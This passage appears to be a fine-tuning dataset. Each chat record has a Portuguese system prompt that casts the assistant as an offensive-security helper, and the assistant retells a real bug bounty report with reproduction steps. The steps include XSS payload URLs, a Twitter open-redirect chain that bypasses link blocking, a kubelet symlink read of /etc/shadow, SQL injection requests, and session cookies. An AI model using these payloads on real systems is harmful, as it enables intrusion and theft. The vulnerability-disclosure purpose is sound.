OK\n< content-type: application/json; charset=utf-8\n< content-length: 17\n< Date: Tue, 03 Nov 2020 19:21:41 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"hello\":\"world\"}\n```\n\nThough, if we request the same route with an `Accept-Version` header:\n\n```sh\ncurl -v -H \"Accept-version: tada\" http://localhost:9000\n```\n\nit outputs a HTTP 404:\n\n```sh\n* Trying 127.0.0.1:9000...\n* TCP_NODELAY set\n* Connected to localhost (127.0.0.1) port 9000 (#0)\n> GET / HTTP/1.1\n> Host: localhost:9000\n> User-Agent: curl/7.68.0\n> Accept: */*\n> Accept-version: tada\n> \n* Mark bundle as not supporting multiuse\n< HTTP/1.1 404 Not Found\n< content-type: application/json; charset=utf-8\n< content-length: 72\n< Date: Tue, 03 Nov 2020 19:25:09 GMT\n< Connection: keep-alive\n< Keep-Alive: timeout=5\n< \n* Connection #0 to host localhost left intact\n{\"message\":\"Route GET:/ not found\",\"error\":\"Not Found\",\"statusCode\":404}\n```\n\nWhen a http cache / CDN are in front of such a server, an attacker can use this behavior to trigger caching of a 404 page on a legal route. Ex; A default Fastly (the CDN we use) or Varnish config will result in a cached 404 page with the above setup.\n\nWhen versioned routes are in use I also think that a `Vary` http header with `Accept-Version` as a value should be added to the response. That shall prevent a http cache / CDN from caching a 404 under the same cache key as a previous response.\n\nThough; to avoid this behavior when not using version routes I think it should be possible to turn off version routes. Is there an easy way to do so? Type a boolean on the constructor? Or do one need to write a custom version parser which according to doc affect performance?\n\nIts highly debatable if this is a security issue in Fastify, though, behavior of this might be worth having a second look at. Personally I was a bit surprised that versioned routes was a default behavior. I would expect it to be an opt in instead of opt out (if its possible to opt out).\n\n### Impacto\nAn attacker can use this cache poisoning to perform an attack where fully functionally URLs are replaced with 404's."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Exposed Configuration Files at https://www.exodus.io/keybase.txt"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUsername, uid information is present in txt file.\n\n### Passos para Reproduzir\n1. Open This link https://www.exodus.io/keybase.txt \n 2. Search for username, uid\n 3. You will get some usernames with uid.\n\n### Impacto\nThis information may help attacker in further attacks."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS in https://███████ via hidden parameter \"████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://███████/███████&███=TEST%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://█████████/█████████\n\nWith a little research, you can find a hidden parameter \"████████\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflexive XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS on https://███/████via hidden parameter \"█████████\""}, {"role": "assistant", "content": "### Passos para Reproduzir\n- Use your favorite web browser\n- Go to : \n```\nhttps://█████/████████&██████=XXX%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%20here%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://██████/guest/tls_sso.php\n\nWith a little research, you can find a hidden parameter \"███\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n### Impacto\nThe damages of a reflected XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Read-only application can publish/delete fleets"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nTwitter released [Fleet](https://blog.twitter.com/ja_jp/topics/product/2020/ntroducing-fleets-new-way-to-join-the-conversation-jp.html) yesterday. This feature is working with few APIs, and these APIs are missing permission checks.\n\n### Passos para Reproduzir\n1. Install [twurl](https://github.com/twitter/twurl).\n 1. Authenticate as a read-only application.\n 1. Execute following command: `twurl /fleets/v1/create -X POST --header 'Content-Type: application/json' -d '{\"text\":\"Hey yo\"}'`\n 1. A fleet with `Hey yo` text will be created.\n\n### Impacto\nThe read-only application can publish fleets without getting Write permission. This issue has a similar impact to #434763"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Choose the target URL; let's take `https://ddosecrets.com` as an example.\n 2. Replace all occurrences of the ASCII period by the URL-encoded version of the [Ideographic Full Stop](https://unicode-table.com/en/3002/), i.e. `%E3%80%82`: `https://ddosecrets%E3%80%82com`.\n 3. URL-encode the result of step 2: `https%3A%2F%2Fddosecrets%25E3%2580%2582com`.\n 4. Append the result of step 3 to `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=` and append `%3F` to the result: `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=https%3A%2F%2Fddosecrets%25E3%2580%2582com%3F`.\n 5. URL-encode the result of step 4: `https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 6. Append the result of step 5 to `https://twitter.com/login?redirect_after_login=`: `https://twitter.com/login?redirect_after_login=https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 7. Log in to Twitter and tweet the URL resulting from step 6. Posting the tweet will succeed (but it shouldn't, if link validation were effective).\n 8. Click the malicious link in the tweet you just posted; you'll get redirected to the forbidden domain without being shown any Twitter interstitial page.\n\n(If you're not logged in to Twitter when you click the malicious link, you'll get prompted to log in, but you will still get redirected to the forbidden domain afterwards.)\n\n### Impacto\nAttackers can defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links) and post arbitrary unsafe links (starting with `https://twitter.com`, which really compounds the problem) in tweets."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Kubelet follows symlinks as root in /var/log from the /logs server endpoint"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nPrivilege escalation from a pod, to root read permissions on the entire filesytem of the node, by creating symlinks inside /var/log.\nThe kubelet is simply serving a fileserver at /var/log:\n\n_kubernetes\\pkg\\kubelet\\kubelet.go:1371_\n```golang\nif kl.logServer == nil {\n\t\tkl.logServer = http.StripPrefix(\"/logs/\", http.FileServer(http.Dir(\"/var/log/\")))\n\t}\n```\nThe kubelet naturally runs as root on the node, so this basically gives the ability for pods with write permissions to /var/log directory a directory traversal as a root user on the host (potentially taking over the whole cluster by getting secret keys)\nAn easy fix is checking the symlink destination, to figure out whether it is inside /var/lib/docker or other whitelisted paths to not break to mechanism of logs correlations\n\nA while back, I discovered this bug, when you didn't had the Bug Bounty program. \nI Published the following blog:\nhttps://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts\nDescribing the vulnerability.\n\n(it requires RBAC permissions to read logs, or a kubelet configured with AlwaysAllow. and a mount point to any child directory inside /var/log)\nI researched some log collectors projects in github, seems like alot of them are freely using this mount point.\nAs a user I would not imagine those projects can potentially take clusters.\n\n### Passos para Reproduzir\n1. create a pod with a mount path to `/var/log`\n 1. create a symlink in the mount point: `/var/log/rootfs_symlink -> /`\n 1. curl from within the pod: `https://:10250/logs/rootfs_symlink/etc/shadow`\n\n### Impacto\nRoot read permissions on the entire filesystem of the node"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: XSS in Email Input [intensedebate.com]"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nI found an XSS in Email input. This input is not sanitized like other inputs allowing user to execute xss payloads.\n\n### Passos para Reproduzir\n1. Navigate to your account.\n2. In email address, add the below payload next to your email.\n`\">`\n\n### Impacto\nReflected XSS, An attacker can execute malicious javascript codes on the target application (email input specifically). It is highly recommended to fix this one because it is found in sensitive input (email).\n\nKind Regards."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Some build dependencies are downloaded over an insecure channel (without subsequent integrity checks)"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nBuild jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91) download dependencies from `build.openvpn.net` and `www.oberhumer.com`over an insecure channel (`http`, _not_ `https`) and do not check their integrity in any way.\n\nThis opens the door to person-in-the-middle attacks, whereby an attacker controlling an intermediate node on the network path between Travis CI's build servers and those two servers could manipulate traffic and inject his own malicious code into the artifacts produced by the two jobs in question.\n\n### Passos para Reproduzir\nThe `install` phase of the `.travis.yml` file [unconditionally executes](https://github.com/openvpn/openvpn/blob/master/.travis.yml#L120) the `.travis/build-deps.sh` script. If the following three conditions are satisfied,\n\n1. [the OS be other than `windows`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L4),\n2. [environment variable `SSLLIB` be set to `openssl`](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L148), and\n3. [environment variable `CHOST` be set](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L161),\n\n(they are only satisfied for build jobs [`mingw64 | openssl-1.1.1d`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L87) and [`mingw32 | openssl-1.0.2u`](https://github.com/OpenVPN/openvpn/blob/master/.travis.yml#L91)), then shell functions `download_tap_windows` and `download_lzo` are executed [one](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L162) after the [other](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L165).\n\nShell functions `download_tap_windows` and `download_lzo` are defined above ([here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18) and [here](https://github.com/OpenVPN/openvpn/blob/master/.travis/build-deps.sh#L18), respectively) in `.travis/build-deps.sh`:\n\n```shell\ndownload_tap_windows () {\n if [ ! -f \"download-cache/tap-windows-${TAP_WINDOWS_VERSION}.zip\" ]; then\n wget -P download-cache/ \\\n \"http://build.openvpn.net/downloads/releases/tap-windows-${TAP_WINDOWS_VERSION}.zip\"\n fi\n}\n\ndownload_lzo () {\n if [ ! -f \"download-cache/lzo-${LZO_VERSION}.tar.gz\" ]; then\n wget -P download-cache/ \\\n \"http://www.oberhumer.com/opensource/lzo/download/lzo-${LZO_VERSION}.tar.gz\"\n fi\n}\n```\n\nNote that both `wget` commands use `http` as opposed to `https` ( though using `https` is readily possible, since both domains `build.openvpn.net` and `www.oberhumer.com` support `https` and have valid TLS certificates) .\n\n### Impacto\nThe two dependencies are downloaded over an insecure channel and, therefore, can be intercepted and tampered with by a person in the middle (controlling an intermediate node on the network path between Travis CI's build servers).\n\nMoreover, as no integrity checks seem to be performed after download, a person-in-the-middle attack would go undetected and could seriously compromise the integrity of the artifacts produced by those two build jobs.\n\nPlease do not dismiss the possibility of such an attack too quickly, as it is [not as far-fetched as one would think](https://medium.com/bugbountywriteup/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Email Verification bypass on signup"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThis bug is related to wordpress.com. There is feature in wordpress.com which allow users to invite people. We have to enter email address to invite that particular person but the invite link and invite key is also available to the person who invited. This allow attackers to create the profile without having access to the email address and they can make account on behalf of any people who is not already signed up in wordpress.com\n\n### Passos para Reproduzir\nThis issue can be reproduced by following these easy steps: \n* Login to your account on wordpress.com\n* Setup burpsuite proxy with browser.\n* Select your site and navigate to manage>people\n* Enter any email address which is not already registered in wordpress.com and invite\n* Open this url in browser: https://wordpress.com/people/invites/yoursite.wordpress.com [change yoursite.wordpress.com with your site]\n* See the burp suite proxy tab and find the GET request to this endpoint [https://public-api.wordpress.com/rest/v1.1/sites/siteId_here/invites?http_envelope=1&status=all&number=100] [there will be a number instead of siteId_here]\n* In response of this GET request you will see JSON which will be consisting of the details about the invitations sent and there you will find \"invite_key\" and \"link\".\n* Copy the link and open this in another browser.\n* You can create account on behalf of this email without having access to the email and email verification is bypassed :)\n\n**See the attached video for POC**\n\n### Impacto\nThis issue can be used to bypass email verification on signup. Attackers can create account on behalf on any person without having access to the email account. This issue is affecting integrity of the wordpress.com"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8284: trusting FTP PASV responses"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nThe issue here arises from the fact that curl by default has the option CURLOPT_FTP_SKIP_PASV_IP disabled by default.\nAs a result, an attacker controlling the URL used by curl, can perform port scanning on behalf of the server where curl is running.\nThis can be achieved by setting up a custom FTP server that would setup the data channel through the PASV command using the port scanning target IP and port in the PASV connection info. \nOne good target for this issue are web applications vulnerable to SSRF.\n\n### Passos para Reproduzir\nSo we can differentiate between open, closed and filtered ports with the following:\n1. Open ports\ncurl will reply with TYPE after the PASV command\nexample:\nReceived: USER anonymous in 5\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 6ms\n**Received: TYPE I in 6ms**\nReceived: SIZE whatever in 5ms\nReceived: RETR whatever in 5ms\n\n2. Filtered\ncurl will timeout after the PASV command\nexample:\nReceived: USER anonymous in 6\nReceived: PASS ftp@example.com in 5\nReceived: PWD in 5ms\nReceived: EPSV in 6ms\nReceived: PASV in 5ms\nReceived: in **1011ms**\n\n3. Closed\ncurl will close the control channel connection immediately after PASV\nexample:\nReceived: USER anonymous in 6ms\nReceived: PASS ftp@example.com in 6ms\nReceived: PWD in 5ms\nReceived: EPSV in 5ms\nReceived: PASV in 5ms\nReceived: in **5ms**\n\nIn the attachments, I have included an ftp server (F1088885) that automates these steps.\nUsage:\n./ssrf_pasvaggresvftp.sh -t 127.0.0.1/31 -p 80,8000-8100 -x ./ftp_curl.sh -vv\n\nthe file included in the -x option is supposed to trigger the ssrf on the target server that would lead to the call of curl with the attacker's URL. In this case we simulate the issue by calling curl locally. The attachment F1088859 is the script used in the example.\n\n### Impacto\nThrough the port scanning, an attacker could uncover services running in the internal network.\nIt could also be possible to perform version enumeration or other information disclosure if the attacker can get back the results of curl.\nFor example, an attacker points curl at host:22 for the data channel . If an ssh server is running on that host, then it will reply with its version which is then disclosed to the attacker.\n\nUltimately, this issue can be used as a stepping stone to launch further attacks on the vulnerable server."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] XSS Reflected POST-Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, i have found a XSS Reflected POST-Based in `https://www.intensedebate.com/ajax.php`.\n\nVulnerable(s) URL :\n\n```POST /https://www.intensedebate.com/ajax.php```\n\nVulnerable(s) Parameter(s):\n\n```\n$_POST['txt'];\n```\n\nPayload\n\n```\nazertyuiop<<>\n```\n\n### Impacto\nA attacker can perform a phishing attack or perform a CORS attack"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Permanent DoS at https://happy.tools/ when inviting a user"}, {"role": "assistant", "content": "### Passos para Reproduzir\n1. Using separate browsers or browser containers, login to two different accounts. At least one account should have admin privileges in order to invite users.\n2. In the other account under the [preferences tab](https://schedule.happy.tools/preferences), notice the user email, change the email to ``boy_child@wearehackerone.com`` and save changes.\n3. In the admin account under the [users tab](https://schedule.happy.tools/admin/users), click on ``Invite team members`` and input the email ``boy_child@wearehackerone.com``.\n4. Scroll down and click on ``Send invite``.\n5. The request will fail.\n6. Repeat steps 2 to 4, but changing the email to that of other users (test accounts) and the request to send an invite link will continuously fail.\n\n### Impacto\nThrough user enumeration of emails and mass exploitation, there is a permanent denial of service denying a Happy Tools admin from adding team members to their organization."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Reflected XSS at https://www.glassdoor.com/ via the 'numSuggestions' parameter"}, {"role": "assistant", "content": "### Passos para Reproduzir\nGo to: `https://www.glassdoor.com/searchsuggest/typeahead?numSuggestions=8rk3s6%22%3Cimg/**/src%3D%22x%22/**/onx%3D%22%22/**/onerror%3D%22alert%60l0cpd%60%22%3Ef9y60`\n{F1092213}\n\n### Impacto\nThe attacker can execute JS code."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: Async search stores authorization headers in clear text"}, {"role": "assistant", "content": "### Passos para Reproduzir\n```\n# This just triggers an async-search as yourself.\nPOST /_async_search?size=0&wait_for_completion_timeout=0\n{\n \"query\": {\n \"match_all\": {}\n }\n}\n\n# This shows where the clear text authorization header is stored\nPOST /.async-search/_search\n{\n \"_source\": \"headers.*\"\n}\n```\n\n### Impacto\n- Super users can get the clear text credentials of other users.\n- An XSS with a superuser victim can now trivially get the authorization headers of its target."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: HTTP2 'unknownProtocol' cause Denial of Service by resource exhaustion"}, {"role": "assistant", "content": "### Passos para Reproduzir\nThe following steps assume you are on a linux system. Everything will run on your host system. The IP in the client is hard-coded to `127.0.0.1` and the port is `50000`. The scripts are kept as simple as possible. \n\n1. Create a file `client.sh` with the content provided in the Supporting Material section below (don't start it now)\n2. Create the Javascript file (see Supporting Material section below) and run the example server (may you want to customize the port). You can also start a non-secure server using `createServer()` if you don't have an example key or cert around.\n3. You query the file descriptors with the command provided in the Supporting Material section below. Simply replace `{PID}` with the process id of your node server.\n4. Maybe you also want to watch the memory consumption with the tool you prefer.\n5. Now you are ready to start the client script.\n\nWe initially found this issue by running the Greenbone Vulnerability Manager on our server port with the **OvenVAS default** scanner, the **Fast and ultimate** configuration with all kind of vulnerability tests enabled and the **TCP-SYN Service Ping** alive check.\n\nThe affected code that causes this issue seems to be [here](https://github.com/nodejs/node/blob/c0ac692ba786f235f9a4938f52eede751a6a73c9/lib/internal/http2/core.js#L2918-L2929).\n\nWe are running on Linux x86 with kernel v4.19.148 with node v12.19.0.\n\n### Impacto\n:\nAny code that relies on the http2 server is affected by this behaviour. For example the JavaScript implementation of GRPC also uses a http2 server under the hood.\n\nThis attack has very low complexity and can easily trigger a DOS on an unprotected server.\n\nThe above server example consumes about 6MB memory after start-up. Running the described attack causes a memory consumption of more than 400MB in approximately 30s and holding more than 7000 file descriptors. Both, the file descriptors and the memory, are never freed."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: [intensedebate.com] SQL Injection Time Based On /js/commentAction/"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello,\n\nI have found a SQLI Injection Time Based on `/js/commentAction/`.\n\nWhen a user want to submit/reply to a comment, a JSON payload was send by a GET request.\n\n\n```GET /js/commentAction/?data={\"request_type\":\"0\",+\"params\":+{+\"firstCall\":true,+\"src\":0,+\"blogpostid\":504704482,+\"acctid\":\"251219\",+\"parentid\":\"0\",+\"depth\":\"0\",+\"type\":\"1\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"anonName\":\"\",+\"anonEmail\":\"X\",+\"anonURL\":\"\",+\"userid\":\"26745290\",+\"token\":\"7D0GVbxG10j8hndedjhegHsnfDrcv0Yh\",+\"mblid\":\"1\",+\"tweetThis\":\"F\",+\"subscribeThis\":\"1\",+\"comment\":\"w\"}} HTTP/1.1\nHost: www.intensedebate.com```\n\nThe key `\"acctid\":\"251219\"` is vulnerable to SQL Injection Time based\n\n### Impacto\nFull database access holding private user information."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: CVE-2020-8285: FTP wildcard stack overflow"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nUser 'xnynx' on github filed [PR 6255](https://github.com/curl/curl/issues/6255) highlighting this problem. **Filed publicly**\n\nMy first gut reaction was that this had to be a problem with `curl_fnmatch` as that has caused us grief in the past (and on most platforms we use the native `fnmatch()` now, but not on Windows IIRC and this is a reported to happen on Windows), but I then built a test program and I made it crash in what seems like potential stack overflow due to recursive calls to `wc_statemach` from within itself.\n\n### Passos para Reproduzir\n1. build 6255.c (attached)\n 1. run it (with a debugger)\n 1. inspect the crash\n\nThe example app lists a directory with 40,000 files on funet.fi.\n\n### Impacto\nI haven't yet worked out exactly how to get what into the stack and what the worst kind of exploit of this might be, but a stack overflow that can be triggered by adding/crafting files in the server feels bad."}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: SQL Injection Union Based"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello, \n\nI have found a SQL Injection Union Based on `https://intensedebate.com/commenthistory/$YourSiteId `\nThe `$YourSiteId` into the url is vulnerable to SQL Injection.\n\n### Impacto\nFull database access holding private user information and Reflected Cross-Site-Scripting"}]} +{"messages": [{"role": "system", "content": "Você é um assistente de inteligência artificial especializado em segurança ofensiva e pentest. Seu objetivo é ajudar pesquisadores de segurança a entender vulnerabilidades reais, fornecendo resumos técnicos, passos de reprodução e análises de impacto baseadas em relatórios reais de bug bounty."}, {"role": "user", "content": "Explique a vulnerabilidade e como reproduzi-la baseando-se no relatório: No rate limiting - Create data"}, {"role": "assistant", "content": "### Resumo da Vulnerabilidade\nHello team Stripo, how are you?\n\nI found a rate limit for data creation.\n\nTarget = https://my.stripo.email/cabinet/#/my-services/298427?tab=data-sources\n\nRequest to Post:\n\n```\nPOST /emailformdata/v1/amp-lists?projectId= HTTP/1.1\nHost: my.stripo.email\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json;charset=UTF-8\nCache-Control: no-cache\nPragma: no-cache\nExpires: Sat, 01 Jan 2000 00:00:00 GMT\nX-XSRF-TOKEN: 3ef1a2b8-f640-457b-bac8-1d629d0f9498\nContent-Length: 198\nOrigin: https://my.stripo.email\nConnection: close\nReferer: https://my.stripo.email/cabinet/\nCookie: amplitude_id_246810a6e954a53a140e3232aac8f1a9stripo.email=eyJkZXZpY2VJZCI6ImU1NjAwZjk3LTFiY2QtNDIzOS1iZTczLWNmNWVhYmMzMTJkZFIiLCJ1c2VySWQiOm51bGwsIm9wdE91dCI6ZmFsc2UsInNlc3Npb25JZCI6MTYwNjc0NjU3NzcwMCwibGFzdEV2ZW50VGltZSI6MTYwNjc0Njg1ODg3OCwiZXZlbnRJZCI6MCwiaWRlbnRpZnlJZCI6MCwic2VxdWVuY2VOdW1iZXIiOjB9; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; _ga=GA1.2.730792257.1605012362; _pin_unauth=dWlkPU1UUTFZemczWlRFdE1HSXdOeTAwT1Rrd0xUbGxNVEl0TWpBeE16WmpZVE00WlRZNA; G_ENABLED_IDPS=google; __stripe_mid=e5538cc4-3896-4b96-b703-711ef38535d3313b41; _ga=GA1.3.730792257.1605012362; _gid=GA1.2.1102057235.1606746578; __stripe_sid=fcbc15d6-fe33-41ca-bd12-ad2a6fd80eb5a7fc3c; 